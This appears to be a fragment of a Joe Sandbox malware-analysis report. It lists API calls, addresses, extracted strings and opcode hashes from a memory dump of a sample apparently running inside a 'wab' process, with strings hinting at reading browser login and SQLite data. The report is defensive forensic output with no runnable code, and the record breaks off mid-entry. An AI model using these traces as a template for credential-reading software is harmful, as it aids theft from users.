                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                    • String ID: ($d
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID: 3A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                    • API String ID: 776488737-1622828088
                                                                                                                                                                                                                    • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                                                    • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscat
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    • API String ID: 384018552-4153097237
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00405498
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
